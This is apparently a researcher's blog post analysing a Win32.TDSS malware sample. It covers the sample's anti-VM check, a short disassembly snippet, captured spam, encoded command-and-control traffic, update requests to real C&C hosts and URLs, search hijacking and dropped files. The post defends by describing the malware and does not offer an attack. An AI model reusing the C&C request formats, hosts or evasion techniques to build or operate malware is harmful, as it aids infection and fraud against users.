Skip navigation.
Home

WIn32.TDSS

As a malware researcher I just got my hand on one of the latest TDSS Malware.

The malware uses protection against an execution on a virtual machine by using the SIDT query technique, in case a VMware environment is detected, the malware simply terminates and removes itself from the machine. For this analysis I used solely real machine to perform the analysis. The malware prevent itself from being executed several times using name event, it is pretty convenient as a signaling synchronization as well.

** TO VIEW THE FULL REPORT . http://www.flap71.com/tdss/ **

push esi
push offset aGfdjhfd ; "gfdjhfd"
push 1 ; bInitialState
push 1 ; bManualReset
push 0 ; lpEventAttributes
call ds:CreateEventA

push fs[0]
RCPT TO:
DATA
Received: 20100421082301.2417.qmail@
Date: Wed, 21 Apr 2010 06:23:01 -0120
Message-ID:
To: nicolad@hammondresources.co.uk
Subject: April Discount #88724
From: USA VIAGRA
Reply-To: nicolad@hammondresources.co.uk
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit

http://tuxoxynuri.livejournal.com

Command & Coordination Communication (Data is being encoded)

HTTP/1.1 200 OK
magic-number : 128|1|176:78:92:79:102:102:50:246:184:71:97:63:185:238:83:142:67:

150:205:76:183:198:210:215:181:120:211:118:191:153:157:112:231:250:191:77:96:242:68:24:58:

165:88:243:148:171:129:215:66:79:36:249:22:246:208:203:110:163:65:46:60:223:158:36:217:93:113:57:80:

181:82:138:91:170:125:240:86:255:200:152:79:236:145:101:226:97:49:81:5:114:127:66:82:29:102:43:123:215:

100:203:141:183:85:233:98:211:217:184:211:162:80:34:142:226:136:112:68:185:194:73:44:65:139:126:95:241:169:218:
content-length : 40448
entity-info : 1271783310:40448:2;
x-powered-by : PHP/5.2.6-1+lenny8
vary : Accept-Encoding
server : nginx/0.6.32
connection : close
version : 1
date : Wed, 21 Apr 2010 07:30:58 GMT
rnd : 11988440
content-type : text/html; charset=utf-8

http://hjwbxhqr.cn/win-xp/controller.php?action=report&guid=0&rnd=11987634&uid=7&entity=1271783310

Send Update Notification To The Command & Coordination Server

GET /antivirus/update.php HTTP/1.1
User-Agent: id=1A62322F6358&tick=235059234&ver=101&smtp=ok&task=36&continue=1&errors[0]=27&errors[702]=13&errors[703]=2&errors[710]=4&errors[715]=1&errors[716]=5&errors[719]=22
Host: 91.207.7.218
Connection: Keep-Alive
Cache-Control: no-cache

Local ports binding.
TCP 1062
TCP 1082
TCP 1086
TCP 1098
TCP 1101
TCP 1102
TCP 1103

Alter Google Toolbar Search.

from the above we can conclude that the malware hooks to the google tools bar uses the omaha-client-server update 2 which is google protocol of updating their products. the reason for this is to update the remote server and to check for any new updates, secondly its alter the user search responds from google and redirect to its affiliates "partnerka's" as we saw above.
its also send the victim operating system details which includes OS version and service Pack.

Local System Modifications.
wiaservg.log
%System%\wbem\grpconv.exe
%Windir%\Temp\wpv801271783310.exe